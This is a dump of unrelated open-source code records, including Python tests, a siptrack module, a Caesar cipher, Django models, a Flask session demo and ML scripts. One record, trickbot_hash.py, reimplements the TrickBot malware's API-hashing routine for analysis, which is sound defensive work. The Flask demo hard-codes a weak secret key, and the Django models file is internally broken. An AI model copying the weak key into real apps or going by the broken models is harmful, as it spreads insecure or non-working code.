GuardedUserModel()\n user = resource.read('1', {}, {})\n\n self.assertDictEqual(users[0]._asdict(), user.get_attributes(),\n \"should return first user\")\n\n @staticmethod\n def testRollbackBefore():\n class DenyPolicy(ResourcePolicy):\n default = Access.DENY\n\n @transactional_guard([DenyPolicy()])\n class GuardedUserModel(UserResource, GuardedMixin):\n pass\n\n class TestTHolder(TransactionHolder):\n rollback = mock.MagicMock()\n _orm = mock.MagicMock()\n\n with mock.patch(\n 'zsl.application.modules.alchemy_module.TransactionHolder',\n side_effect=TestTHolder\n ):\n resource = GuardedUserModel()\n resource.read('', {}, {})\n\n TestTHolder.rollback.assert_called_with()\n TestTHolder._orm.assert_not_called()\n\n @staticmethod\n def testRollbackAfter():\n class DenyAfterPolicy(ResourcePolicy):\n default = Access.ALLOW\n\n def can_read__after(self, *args, **kwargs):\n return Access.DENY\n\n mock_sess = mock_db_session()\n\n @transactional_guard([DenyAfterPolicy()])\n class GuardedUserModel(UserResource, GuardedMixin):\n pass\n\n class MyTestCase(DbTestCase, TestCase):\n def runTest(self):\n pass\n\n def testIt(self):\n resource = GuardedUserModel()\n resource.read('', {}, {})\n\n if hasattr(mock_sess.query, 'assert_called'):\n mock_sess.query.assert_called()\n mock_sess.rollback.assert_called_with()\n\n test_case = MyTestCase()\n test_case.setUp()\n test_case.testIt()\n test_case.tearDown()\n","repo_name":"AtteqCom/zsl","sub_path":"tests/resource/transactional_guard_test.py","file_name":"transactional_guard_test.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7165933258","text":"from siptracklib.objectregistry import object_registry\nfrom siptracklib import treenodes\nfrom siptracklib import attribute\nfrom siptracklib import permission\n\ndef get_queue(object_store, queue_name):\n ret = None\n for queue in object_store.view_tree.listChildren(include = ['command queue']):\n if queue.attributes.get('name') == queue_name:\n ret = queue\n break\n return ret\n\nclass CommandQueue(treenodes.BaseNode):\n class_id = 'CQ'\n class_name = 'command queue'\n class_data_len = 0\n\n def _commandSorter(self, x, y):\n return cmp(x.ctime, y.ctime)\n\n def 
listCommands(self):\n commands = list(self.listChildren(include = ['command']))\n commands.sort(cmp=self._commandSorter)\n return commands\n\n def processCommands(self, only_unique = False, dedup_sequential = False, remove = False):\n sent = {}\n prev_command = None\n for command in self.listCommands():\n skip = False\n if only_unique:\n if command.freetext in sent:\n skip = True\n sent[command.freetext] = True\n if dedup_sequential:\n if prev_command == command.freetext:\n skip = True\n prev_command = command.freetext\n if not skip:\n yield command\n if remove:\n command.remove()\n\nclass Command(treenodes.BaseNode):\n class_id = 'C'\n class_name = 'command'\n class_data_len = 1\n\n def __init__(self, parent, freetext = None):\n super(Command, self).__init__(parent)\n self._freetext = freetext\n\n def _created(self):\n self.oid = self.transport.add(self.parent.oid, self._freetext)\n\n def _loaded(self, node_data):\n super(Command, self)._loaded(node_data)\n self._freetext = node_data['data'][0]\n\n def _get_freetext(self):\n return self._freetext\n\n def _set_freetext(self, val):\n self._freetext = val\n self.transport.setFreetext(self.oid, val)\n freetext = property(_get_freetext, _set_freetext)\n\n def setStatus(self, status):\n self.attributes['status'] = status\n\nclass EventTrigger(treenodes.BaseNode):\n class_id = 'ET'\n class_name = 'event trigger'\n class_data_len = 0\n\nclass EventTriggerRulePython(treenodes.BaseNode):\n class_id = 'ETRP'\n class_name = 'event trigger rule python'\n class_data_len = 3\n\n def __init__(self, parent, code = None):\n super(EventTriggerRulePython, self).__init__(parent)\n self._code = code\n self._error = ''\n self._error_timestamp = 0\n\n def _created(self):\n self.oid = self.transport.add(self.parent.oid, self._code)\n\n def _loaded(self, node_data):\n super(EventTriggerRulePython, self)._loaded(node_data)\n self._code = node_data['data'][0]\n self._error = node_data['data'][1]\n self._error_timestamp = node_data['data'][2]\n\n def _get_code(self):\n return self._code\n def _set_code(self, val):\n self._code = val\n self.transport.setCode(self.oid, val)\n code = property(_get_code, _set_code)\n\n @property\n def error(self):\n return self._error\n\n @property\n def error_timestamp(self):\n return self._error_timestamp\n\n# Add the objects in this module to the object registry.\no = object_registry.registerClass(Command)\no.registerChild(attribute.Attribute)\no.registerChild(attribute.VersionedAttribute)\no.registerChild(permission.Permission)\n\no = object_registry.registerClass(CommandQueue)\no.registerChild(attribute.Attribute)\no.registerChild(attribute.VersionedAttribute)\no.registerChild(permission.Permission)\no.registerChild(Command)\n\no = object_registry.registerClass(EventTriggerRulePython)\no.registerChild(attribute.Attribute)\no.registerChild(attribute.VersionedAttribute)\no.registerChild(permission.Permission)\n\no = object_registry.registerClass(EventTrigger)\no.registerChild(attribute.Attribute)\no.registerChild(attribute.VersionedAttribute)\no.registerChild(permission.Permission)\no.registerChild(EventTriggerRulePython)\n","repo_name":"sii/siptrack","sub_path":"siptracklib/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":4100,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"}
{"seq_id":"19281190133","text":"def rollLengthFunc(twoChars): #Takes a string \"AB\" and returns the distance every letter should be \"rolled\"\n\tlength = ord(twoChars[1]) - ord(twoChars[0])\n\tif(not length == abs(length)): #Did start - stop come out negative?\n\t\tlength = 26 - abs(length)\n\treturn length\n\ndef convertLine(line,rollLength): #line = a row from the file. rollLength = how far should each letter be rolled?\n\tretLine=\"\"\n\tfor char in line:\n\t\tif char == \" \" or not char.istitle(): #Is the letter lowercase or a space?\n\t\t\tappendChar = char\n\t\telse:\n\t\t\tif ( ord(char) + rollLength) > 90: #Will the roll \"start over from A\"?\n\t\t\t\tappendChar = chr( ord(char) -26 + rollLength)\n\t\t\telse:\n\t\t\t\tappendChar = chr(ord(char) + rollLength)\n\n\t\tretLine += appendChar #Append the letter to the end of the initially empty string.\n\n\treturn retLine + \"\\n\" #Return the encrypted string\n\n\n\n\ndef crypto():\n\tfromFileString = input(\"What file would you like to read from?\")\n\tencryptionString = input(\"What does ur encryption look like?\")\n\n\trollLength = rollLengthFunc(encryptionString) #How far should the letters be rolled?\n\t\n\ttry:\n\t\tfromFile = open(fromFileString,\"r\") \n\t\ttoFile = open(\"encryptedWith\" +encryptionString +\".txt\" , 'w')#Creates a new file whose name tells which encryption key was used.\n\n\t\tfor line in fromFile:\n\t\t\tline.rstrip('\\n')\n\t\t\ttoFile.write( convertLine(line, rollLength)) #Write whatever convertLine returns.\n\n\n\t\tfromFile.close()\n\t\ttoFile.close()\n\n\texcept IOError:\n\t\tprint(\"You entered an invalid filename, closing down \\n\")\n\t\tpass\n\n\nif __name__ ==\"__main__\": #Makes it possible to run doctest without commenting anything out.\n\tcrypto()\n\n","repo_name":"MaxKrog/KTH","sub_path":"PRGOMED/lab4/lab4.py","file_name":"lab4.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"sv","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"28431531889","text":"import json\n\n\ndef merge_personal():\n with open('meta_data/ccw_rate.json', 'r') as rate, open('meta_data/ccw_count.json', 'r') as count, open('ccw.json', 'w') as output:\n\n correct_rate_data = json.load(rate)\n correct_count_data = json.load(count)\n\n for name in correct_count_data:\n correct_rate_data[name]['excellentLegislatorNum'] = correct_count_data[name]['excellentLegislatorNum']\n correct_rate_data[name]['observedLegislatorNum'] = correct_count_data[name]['observedLegislatorNum']\n\n merge_data = json.dumps(correct_rate_data, ensure_ascii=False, indent=4)\n output.write(merge_data)\n","repo_name":"g0v/2020voting-guide","sub_path":"crawler/citizen_congress_watch/merge_excel_web/merge_personal.py","file_name":"merge_personal.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"72"}
{"seq_id":"42071402941","text":"from django.db import models\nfrom django.template.defaultfilters import slugify\nimport datetime\n\n\n# All Models will fall under a specific year/ statistic period\nclass StatsPeriod(models.Model):\n\tyear = models.IntegerField(unique=True)\n\tslug = 
models.SlugField(unique=True)\n\n\tclass Meta:\n\t\tverbose_name_plural = \"Gender categories\"\n\n\tdef save(self, *args, **kwargs):\n\t\tself.slug = slugify(self.gender)\n\t\tsuper(GenderCategory, self).save(*args, **kwargs)\n\n\tdef __str__(self):\n\t\treturn self.gender\n\n# Social Platform model defined here\nclass SocialPlatform(models.Model):\n\tgendercategory = models.ForeignKey(GenderCategory, on_delete=models.CASCADE)\n\tplatform = models.CharField(max_length=12)\n\tslug = models.SlugField()\n\n\tclass Meta:\n\t\tunique_together = ('gendercategory', 'platform')\n\n\tdef save(self, *args, **kwargs):\n\t\tself.slug = slugify(self.platform)\n\t\tsuper(SocialPlatform, self).save(*args, **kwargs)\n\n\tdef __str__(self):\n\t\treturn self.platform\n\n# Model for Social Media Usage \nclass PlatformUse(models.Model):\n\tgendercategory = models.ForeignKey(GenderCategory, on_delete=models.CASCADE)\n\tsocialplatform = models.ForeignKey(SocialPlatform, on_delete=models.CASCADE)\n\tfrequency = models.CharField(max_length=40)\n\tusagepercent = models.IntegerField(default=0)\n\tslug = models.SlugField()\n\n\tclass Meta:\n\t\tverbose_name_plural = \"Platform Use\"\n\t\tunique_together = ('gendercategory','socialplatform','frequency')\n\n\tdef save(self, *args, **kwargs):\n\t\tself.slug = slugify(self.frequency)\n\t\tsuper(PlatformUse, self).save(*args, **kwargs)\n\n\tdef __str__(self):\n\t\treturn self.frequency\n\n# Model for classing of comments (Pos or Neg)\nclass CommentStats(models.Model):\n\tsocialplatform = models.ForeignKey(SocialPlatform,on_delete=models.CASCADE)\n\tgendercategory = models.ForeignKey(GenderCategory, on_delete=models.CASCADE)\n\tcommentcategory = models.CharField(max_length=12)\n\tpercentage = models.IntegerField(default=0)\n\n\tclass Meta:\n\t\tverbose_name_plural = \"Comment stats\"\n\t\tunique_together = ('gendercategory','socialplatform','commentcategory')\n\n\tdef __str__(self):\n\t\treturn self.commentcategory\n\n# Political party model\nclass Party(models.Model):\n\tname = models.CharField(max_length=128, unique=True)\n\tslug = models.SlugField(unique=True)\n\n\tclass Meta:\n\t\tverbose_name_plural = \"Parties\"\n\n\tdef save(self, *args, **kwargs):\n\t\tself.slug = slugify(self.name)\n\t\tsuper(Party, self).save(*args, **kwargs)\n\n\tdef __str__(self):\n\t\treturn self.name\n\n# Age bracket model\nclass AgeBracket(models.Model):\n\tagegroup = models.CharField(max_length=128, unique=True)\n\tslug = models.SlugField(unique=True)\n\n\tdef save(self, *args, **kwargs):\n\t\tself.slug = slugify(self.agegroup)\n\t\tsuper(AgeBracket, self).save(*args, **kwargs)\n\n\tdef __str__(self):\n\t\treturn self.agegroup\n\n\n# Ovawp Models begin here\nclass GenderOvawp(models.Model):\n\tgendercategory = models.ForeignKey(GenderCategory, on_delete=models.CASCADE)\n\tovawp = models.CharField(max_length=128)\n\tpercentage = models.IntegerField(default=0)\n\n\tclass Meta:\n\t\tverbose_name_plural = \"Gender ovawp\"\n\t\tunique_together = ('gendercategory', 'ovawp')\n\n\tdef __str__(self):\n\t\treturn self.ovawp\n\nclass PartyOvawp(models.Model):\n\tpartyname = models.ForeignKey(Party, on_delete=models.CASCADE)\n\tovawp = models.CharField(max_length=128)\n\tpercentage = models.IntegerField(default=0) \n\n\tclass Meta:\n\t\tverbose_name_plural = \"Party ovawp\"\n\t\tunique_together = ('partyname','ovawp')\n\n\tdef __str__(self):\n\t\treturn self.ovawp\n\nclass AgeOvawp(models.Model):\n\tagegroup = models.ForeignKey(AgeBracket, on_delete=models.CASCADE)\n\tovawp = 
models.CharField(max_length=128)\n\tpercentage = models.IntegerField(default=0)\n\n\tclass Meta:\n\t\tverbose_name_plural = \"Age ovawp\"\n\t\tunique_together = ('agegroup','ovawp')\n\n\tdef __str__(self):\n\t\treturn self.ovawp\n\t\nclass SocialMediaOvawp(models.Model):\n\tplatformuse = models.ForeignKey(PlatformUse, on_delete=models.CASCADE)\n\tovawp = models.CharField(max_length=128)\n\tpercentage = models.IntegerField(default=0)\n\n\tclass Meta:\n\t\tverbose_name_plural = \"Social Media ovawp\"\n\t\tunique_together = ('platformuse','ovawp')\n\n\tdef __str__(self):\n\t\treturn self.ovawp\n","repo_name":"frankTheCodeBoy/PollicyDashboard","sub_path":"pollicy_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13694178584","text":"from dword import DWORD as dword\nfrom hash_lookup import get_dll_hashes\n\nx = 0xca895f6e\ny = 0x3576a091\n\ndef compute_hash(data):\n\tres = dword(0)\n\tfor b in data:\n\t\tres = ((res + b) * 0x401)\n\t\t_temp = res\n\t\tres = (res >> 6) ^ _temp\n\tres *= 9\n\t_temp = res\n\tres >>= 0xb\n\tres ^= _temp\n\tres *= 0x8001\n\treturn (res & x) | ((~res) & y)\n\nlookup_table = get_dll_hashes(compute_hash)\n","repo_name":"jacobbello/python-malware-tools","sub_path":"trickbot_hash.py","file_name":"trickbot_hash.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40280586457","text":"__author__ = 'Michael'\n\n# Implement a MyQueue class which implements a queue using two stacks.\n\n\nclass MyQueue:\n def __init__(self):\n self.a = Stack()\n self.b = Stack()\n\n def __str__(self):\n while self.a.count > 0:\n self.b.push(self.b.pop())\n\n return str(self.b)\n\n def count(self):\n return self.a.count + self.b.count\n\n def enqueue(self, value):\n while self.a.count > 0:\n self.b.push(self.a.pop())\n\n self.b.push(value)\n\n def dequeue(self):\n while self.b.count > 0:\n self.a.push(self.b.pop())\n\n return self.a.pop()\n\n\nclass Stack:\n def __init__(self):\n self.head = None\n self.tail = None\n self.count = 0\n\n def __str__(self):\n node = self.head.next\n temp = \"[\" + str(self.head.data) + \"]\"\n\n while node is not None:\n temp += \"->[\" + str(node) + \"]\"\n node = node.next\n\n return temp\n\n def count(self):\n return self.count\n\n def push(self, value):\n node = Node(value)\n\n if self.head is None:\n self.head = node\n self.tail = node\n else:\n self.head.previous = node\n node.next = self.head\n self.head = node\n\n self.count += 1\n\n def pop(self):\n if self.head is None:\n return None\n\n node = self.head\n self.head = node.next\n\n if self.head is None:\n self.tail = None\n else:\n self.head.previous = None\n\n self.count -= 1\n\n return node.data\n\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.previous = None\n self.next = None\n\n def __str__(self):\n return str(self.data)\n\n\ndef main():\n test_queue = setup_test_queue()\n print(test_queue)\n\n print(test_queue.dequeue())\n print(test_queue.dequeue())\n print(test_queue.dequeue())\n print(test_queue.dequeue())\n (test_queue.enqueue(\"A\"))\n (test_queue.enqueue(\"P\"))\n print(test_queue)\n\n\ndef setup_test_queue():\n queue = MyQueue()\n\n for x in range(12):\n queue.enqueue(x % 7)\n\n return queue\n\n\nif __name__ == '__main__':\n main()","repo_name":"Ampersandnz/InterviewPrep","sub_path":"3 - Stacks & 
Queues/3.5/3.5.py","file_name":"3.5.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15067894249","text":"A,B,C = map(int,input().split())\r\n\r\namaris = []\r\n\r\nflag = False\r\ncount = 1\r\ntmp = A\r\nwhile True:\r\n amari = tmp % B\r\n if C == amari:\r\n flag = True\r\n break\r\n if amari in amaris:\r\n break\r\n amaris.append(amari)\r\n count += 1\r\n tmp = A * count\r\n\r\nif flag:\r\n print(\"YES\")\r\nelse:\r\n print(\"NO\")","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc060/B/4911627.py","file_name":"4911627.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"8212179078","text":"import unittest\n\nfrom lib.cell_tracking.track_data import TrackData\nimport lib.cell_tracking.track_data as track_data\nfrom lib.cell_tracking import cell_dimensions\nfrom lib.cell_tracking import cell_tracker\n\nimport networkx as nx\n\nclass TrackDataTest(unittest.TestCase): \n def test_final_decentants(self):\n test_tree = [(0, 1), (0, 4), (1, 2), (1,5), (2,14), (1,3), (4,6), (5,8), (5,7), (7,9), (7,10), (7, 11), (11, 12), (11,13)]\n tree = nx.DiGraph()\n for p, c in test_tree:\n tree.add_edge(p, c)\n #nx.draw_networkx(tree, pos=track_data.hierarchy_pos(tree,0), with_labels=True)\n #plt.show()\n final = track_data.get_final_decendents(tree, 5)\n self.assertEqual(final, [8, 9, 10, 12, 13])\n\n\n def test_time_parser(self):\n tests = [(1, 31, \"1h31m\"), (None, 14, \"14m\"), (4, None, \"04h\"), (3,0, \"3h0m\")]\n\n for hour, mins, time_string in tests:\n mins = 0 if mins is None else mins\n hour = 0 if hour is None else hour\n ans = hour*60 + mins \n test = track_data.parse_time(time_string)\n self.assertAlmostEqual(ans, test)\n \nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"npmurphy/biofilm_pulse","sub_path":"tests/track_data.test.py","file_name":"track_data.test.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27741078918","text":"from flask import Flask, session, redirect\n\napp = Flask(__name__)\napp.secret_key = 'allo'\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello {}!'.format(session.get('name', 'Guest'))\n\n\n@app.route('/name/')\ndef set_name(name):\n session['name'] = name\n return redirect('/')\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"profdenis/trans-web-app","sub_path":"05_flask_sessions/01_app.py","file_name":"01_app.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"42296386377","text":"from config import *\nimport tensorflow as tf\nimport numpy as np\nimport os, math\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\ndef sigmoid_threshold(feature, alpha, w):\n with tf.variable_scope('sigmoid_threshold'):\n return tf.nn.sigmoid(-w *(feature - alpha))\n\n\ndef activation_func(z, activation='leaky_relu'):\n if activation == 'leaky_relu':\n return tf.nn.leaky_relu(z)\n elif activation == 'relu':\n return tf.nn.relu(z)\n elif activation == 'selu':\n return tf.nn.selu(z)\n elif activation == 'tanh':\n return tf.nn.tanh(z)\n elif activation == 'sigmoid':\n return tf.nn.sigmoid(z)\n elif activation == 'linear':\n return z\n\n assert False, 'Activation Func \"{}\" not Found'.format(activation)\n\n\ndef 
get_weight(shape, gain=np.sqrt(2), use_wscale=False, fan_in=None):\n if fan_in is None: fan_in = np.prod(shape[:-1])\n std = gain / np.sqrt(fan_in)\n\n if use_wscale:\n wscale = tf.constant(np.float32(std), name='wscale')\n return tf.get_variable('weight', shape=shape, initializer=tf.initializers.random_normal()) * wscale\n else:\n return tf.get_variable('weight', shape=shape, initializer=tf.initializers.random_normal(0, std))\n\n\ndef dense(z, units, activation=None, name='Dense', gain=np.sqrt(2)/4, use_PN=False):\n with tf.variable_scope(name):\n with tf.device(\"/device:{}:0\".format(controller)):\n assert len(z.shape) == 2, 'Input Dimension must be rank 2, but is rank {}'.format(len(z.shape))\n initializer = tf.contrib.layers.variance_scaling_initializer(dtype=tf.float32, factor=gain)\n weights = get_weight([z.shape[1].value, units], gain, use_wscale=True)\n biases = tf.get_variable('bias', [units], initializer=initializer)\n\n y = tf.add(tf.matmul(z, weights), biases)\n\n if activation:\n y= activation_func(y, activation)\n\n if use_PN:\n y = PN(y)\n\n return y\n\n\ndef conv2d(input_vol, input_dim, num_kernal, scope, kernal_size=3, stride=1, activation='leaky_relu', padding='SAME', batch_norm=False, gain=np.sqrt(2), use_PN=False):\n with tf.variable_scope(scope):\n if isinstance(kernal_size, int):\n kernal_height = kernal_size\n kernal_width = kernal_size\n else:\n kernal_height = kernal_size[0]\n kernal_width = kernal_size[1]\n\n with tf.device(\"/device:{}:0\".format(controller)):\n initializer = tf.contrib.layers.variance_scaling_initializer(dtype=tf.float32, factor=gain)\n weights = get_weight([kernal_height, kernal_width, int(input_vol.shape[-1]), int(num_kernal)], gain, use_wscale=True)\n biases = tf.get_variable('bias', [int(num_kernal)], initializer=initializer)\n\n conv = tf.add(tf.nn.conv2d(input_vol, weights, [1, stride, stride, 1], padding=padding), biases)\n\n if batch_norm:\n conv = tf.layers.batch_normalization(conv, training=True)\n\n out = activation_func(conv, activation)\n\n if use_PN:\n out = PN(out)\n\n return out\n\n\ndef get_z(batch_size, z_length):\n with tf.variable_scope('z'):\n z = tf.random_normal(shape=[batch_size, z_length], mean=0, stddev=1, name='random_z')\n\n return z\n","repo_name":"johnryh/GAIN_Implementation","sub_path":"network_utility.py","file_name":"network_utility.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"3290167716","text":"# -*- coding: utf-8\r\n#\r\n# Программа к учебному пособию\r\n# К.Ю. Поляков. Программирование на языках Python и C++\r\n# Часть 2 (9 класс)\r\n# Программа № 21. 
Генераторы списков\r\n#\r\n\r\nN = 10\r\nA = [i for i in range(N)]\r\nprint(A)\r\n\r\nA = list(range(N))\r\nprint(A)\r\n\r\nA = [i*i for i in range(N)]\r\nprint(A)\r\n\r\nA = [i for i in range(100)\r\n if i % 7 == 0]\r\nprint(A)\r\n\r\nA = [i for i in range(100)\r\n if i % 7 == 0 and i % 10 == 1]\r\nprint(A)\r\n","repo_name":"olgaObnosova/EGE","sub_path":"9prog_python/21-arrays-gen.py","file_name":"21-arrays-gen.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17418198361","text":"# example\nimport tensorflow as tf\nfrom alexnet_inference import conv_net\nimport os\nimport sys\nimport numpy as np\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom natsort import natsorted\nBATCH_SIZE = 1\nos.environ['CUDA_VISIBLE_DEVICES'] = '1'\nMODEL_SAVE_PATH = \"model_svhn9/\"\nimgPath = \"../datasets/svhn/mchar_test_a\"\n\n\nx = tf.placeholder(tf.float32, [None, 224, 224])\n\n# def read_and_decode(tfrecords_file, batch_size):\n# \"\"\"\n# val tfrecord is right\n# :param tfrecords_file:\n# :param batch_size:\n# :return:\n# \"\"\"\n# filename_queue = tf.train.string_input_producer([tfrecords_file])\n# reader = tf.TFRecordReader()\n# _, serialized_example = reader.read(filename_queue)\n# img_features = tf.parse_single_example(serialized_example,\n# features={\n# 'label0': tf.FixedLenFeature([], tf.int64),\n# 'label1': tf.FixedLenFeature([], tf.int64),\n# 'label2': tf.FixedLenFeature([], tf.int64),\n# 'label3': tf.FixedLenFeature([], tf.int64),\n# 'image': tf.FixedLenFeature([], tf.string),\n# })\n# image = tf.decode_raw(img_features['image'], tf.uint8)\n# image = tf.reshape(image, [224, 224])\n# image = tf.cast(image, tf.float32) * (1. 
/ 255) # 在流中抛出img张量\n# # length = tf.cast(img_features['length'], tf.int32)\n# label0 = tf.cast(img_features['label0'], tf.int32)\n# label1 = tf.cast(img_features['label1'], tf.int32)\n# label2 = tf.cast(img_features['label2'], tf.int32)\n# label3 = tf.cast(img_features['label3'], tf.int32)\n#\n# image_batch, label_batch0, label_batch1, label_batch2, label_batch3 = \\\n# tf.train.batch([image, label0, label1, label2, label3],\n# batch_size=batch_size,\n# num_threads=2,\n# capacity=32)\n# # length_batch = tf.reshape(length_batch, [batch_size])\n# label_batch0 = tf.reshape(label_batch0, [batch_size])\n# label_batch1 = tf.reshape(label_batch1, [batch_size])\n# label_batch2 = tf.reshape(label_batch2, [batch_size])\n# label_batch3 = tf.reshape(label_batch3, [batch_size])\n#\n# print(\"Read tfrecord doc done!\")\n# return image_batch, label_batch0, label_batch1, label_batch2, label_batch3\n\n\ndef read_and_decode(filename):\n # 根据文件名生成一个队列\n filename_queue = tf.train.string_input_producer([filename])\n reader = tf.TFRecordReader()\n # 返回文件名和文件\n _, serialized_example = reader.read(filename_queue)\n features = tf.parse_single_example(serialized_example,\n features={\n 'img_raw': tf.FixedLenFeature([], tf.string),\n 'label0': tf.FixedLenFeature([], tf.int64),\n 'label1': tf.FixedLenFeature([], tf.int64),\n 'label2': tf.FixedLenFeature([], tf.int64),\n 'label3': tf.FixedLenFeature([], tf.int64),\n })\n # 获取图片数据\n image = tf.decode_raw(features['img_raw'], tf.uint8)\n # 没有经过预处理的灰度图\n image_raw = tf.reshape(image, [224, 224])\n # tf.train.shuffle_batch必须确定shape\n image = tf.reshape(image, [224, 224])\n # 图片预处理\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.subtract(image, 0.5)\n image = tf.multiply(image, 2.0)\n # 获取label\n label0 = tf.cast(features['label0'], tf.int32)\n label1 = tf.cast(features['label1'], tf.int32)\n label2 = tf.cast(features['label2'], tf.int32)\n label3 = tf.cast(features['label3'], tf.int32)\n\n return image, image_raw, label0, label1, label2, label3\n\n\nimage, image_raw, label0, label1, label2, label3 = read_and_decode(\"valData_4_digit_nolen.tfrecord\")\n\n# 使用shuffle_batch可以随机打乱\nimage_batch, image_raw_batch, label_batch0, label_batch1, label_batch2, label_batch3 = tf.train.shuffle_batch(\n [image, image_raw, label0, label1, label2, label3], batch_size=BATCH_SIZE,\n capacity=50000, min_after_dequeue=10000, num_threads=1)\n\n\ndef plot_images(images, label0, label1, label2, label3, label4):\n for i in np.arange(0, 16):\n plt.subplot(4, 4, i + 1)\n plt.axis('off')\n title = str(label0[i]) + str(label1[i]) + str(label2[i]) + str(label3[i]) + str(label4[i])\n plt.title(title, fontsize=10)\n plt.subplots_adjust(wspace=0.5, hspace=0.5)\n plt.imshow(images[i])\n plt.savefig('./name.jpg')\n plt.show()\n\n\nwith tf.Session() as sess:\n # inputs: a tensor of size [batch_size, height, width, channels]\n X = tf.reshape(x, [BATCH_SIZE, 224, 224, 1])\n # 数据输入网络得到输出值\n logits0, logits1, logits2, logits3 = conv_net(X, 11, 0.2, reuse=False, is_training=False)\n\n # 预测值\n predict0 = tf.reshape(logits0, [-1, 11])\n correct_prediction0 = tf.argmax(predict0, 1)\n\n predict1 = tf.reshape(logits1, [-1, 11])\n correct_prediction1 = tf.argmax(predict1, 1)\n\n predict2 = tf.reshape(logits2, [-1, 11])\n correct_prediction2 = tf.argmax(predict2, 1)\n\n predict3 = tf.reshape(logits3, [-1, 11])\n correct_prediction3 = tf.argmax(predict3, 1)\n\n # correct_prediction0 = tf.argmax(logits0, 1)\n # correct_prediction1 = tf.argmax(logits1, 1)\n # correct_prediction2 = tf.argmax(logits2, 1)\n # 
correct_prediction3 = tf.argmax(logits3, 1)\n\n # 初始化\n sess.run(tf.global_variables_initializer())\n # 载入训练好的模型\n saver = tf.train.Saver()\n ckpt = tf.train.get_checkpoint_state(MODEL_SAVE_PATH)\n\n saver.restore(sess, ckpt.model_checkpoint_path)\n # saver.restore(sess, './model_svhn7/model10000.ckpt.data-00000-of-00001')\n\n # 创建一个协调器,管理线程\n coord = tf.train.Coordinator()\n # 启动QueueRunner, 此时文件名队列已经进队\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n\n for i in range(20):\n # 获取一个批次的数据和标签\n b_image, b_image_raw, b_label0, b_label1, b_label2, b_label3 = sess.run([image_batch,\n image_raw_batch,\n label_batch0,\n label_batch1,\n label_batch2,\n label_batch3])\n # 显示图片\n img = Image.fromarray(b_image_raw[0], 'L')\n plt.imshow(img)\n plt.axis('off')\n plt.show()\n # 打印标签\n print('label:', b_label0, b_label1, b_label2, b_label3)\n # 预测\n label0, label1, label2, label3 = sess.run([correct_prediction0,\n correct_prediction1,\n correct_prediction2,\n correct_prediction3], feed_dict={x: b_image})\n # 打印预测值\n print('predict:', label0, label1, label2, label3)\n\n # 通知其他线程关闭\n coord.request_stop()\n # 其他所有线程关闭之后,这一函数才能返回\n coord.join(threads)\n","repo_name":"bruce1408/Tensorflow_learning","sub_path":"week10/src/10_7_predict.py","file_name":"10_7_predict.py","file_ext":"py","file_size_in_byte":7778,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"39963553820","text":"lst = []\nsortlst = []\nfor i in range(1,11):\n lst.append(i)\n\nprint(\"Original list:\\n\",lst)\nfor i in lst:\n for j in lst:\n if(i+j==12):\n if([j,i] not in sortlst):\n sortlst.append([i,j])\n\nprint(\"Set of number whose sum equals 12: \\n\",sortlst)","repo_name":"mht009/Programs","sub_path":"HackerRank/Sort.py","file_name":"Sort.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69957534634","text":"class Solution:\n def addBinary(self, a: str, b: str) -> str:\n max_len = max(len(a), len(b))\n a = a.zfill(max_len)\n b = b.zfill(max_len)\n \n result = ''\n carry = 0 \n \n \n for i in range(max_len - 1, -1, -1):\n r = carry\n r += 1 if a[i] == '1' else 0\n r += 1 if b[i] == '1' else 0 \n \n result = ('1' if r % 2 == 1 else '0') + result\n \n carry = 0 if r < 2 else 1 \n \n if carry != 0 : result = '1' + result\n return result \n \n \nsolve = Solution()\nprint(solve.addBinary(\"1\", \"1\"))\n\n# Đề bài: cho 2 chuỗi binary yêu cầu cộng 2 chuỗi đó lại với nhau \n# Hàm zfill(width) nó sẽ padding 0 vào phía bên trái cho đến khi chuỗi đó có độ dài bằng width\n","repo_name":"d47sec/LearnCode","sub_path":"LeetCode/DataStructure/Array/add_binary.py","file_name":"add_binary.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14809923429","text":"import 